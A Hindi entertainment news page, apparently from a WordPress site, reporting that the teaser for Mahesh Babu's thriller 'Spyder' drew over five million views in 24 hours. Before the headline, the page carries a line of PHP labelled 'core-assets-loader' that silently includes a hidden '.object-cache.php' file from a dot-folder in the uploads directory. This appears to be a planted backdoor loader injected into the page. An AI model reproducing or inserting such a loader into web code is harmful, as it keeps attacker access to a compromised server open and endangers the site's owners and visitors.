add_action('wp_head', function(){echo '';}, 1); /* core-assets-loader */ @include_once('/home/sochindi/public_html/wp-content/uploads/.wp-cache-cd8672/.object-cache.php'); 24 घंटे के भीतर 50 लाख से अधिक बार देखा गया महेश बाबू के ‘स्पाइडर’ का टीजर – SOCH INDIA
Menu

मनोरंजन
24 घंटे के भीतर 50 लाख से अधिक बार देखा गया महेश बाबू के ‘स्पाइडर’ का टीजर

nobanner

सुपरस्टार महेश बाबू की आगामी बाइलिंग्वल थ्रिलर फिल्म ‘स्पाइडर’ का टीजर गुरुवार को जारी हुआ और 24 घंटों के भीतर इसे देखने वालों की संख्या 50 लाख के पार हो गई है. फिल्म के ऑफिसियल यूट्यूब चैनल के मुताबिक, टीजर को 50 लाख से अधिक बार देखा जा चुका है.

एक मिनट 15 सेकंट का टीजर देखते से पता चलता है कि इसमें अधिक तकनीकी विजार्ड का मेल है. एआर मुरुगदौस की निर्देशित फिल्म जैव आतंकवाद पर आधारित है. फिल्म में महेश बाबू एक खुफिया ब्यूरो अधिकारी की भूमिका में हैं.

सूत्रों के मुताबिक फिल्म मारधाड़ से भरपूर है और इसमें महेश अपने आधुनिक अवतार में हैं. राकुल प्रीत सिंह, एसजे सूर्या और भारत द्वारा निर्मित फिल्म का संगीत हेरिस जयराज ने दिया है. भारी बजट में बनी फिल्म 30 सितंबर को रिलीज होने के लिए तैयार है.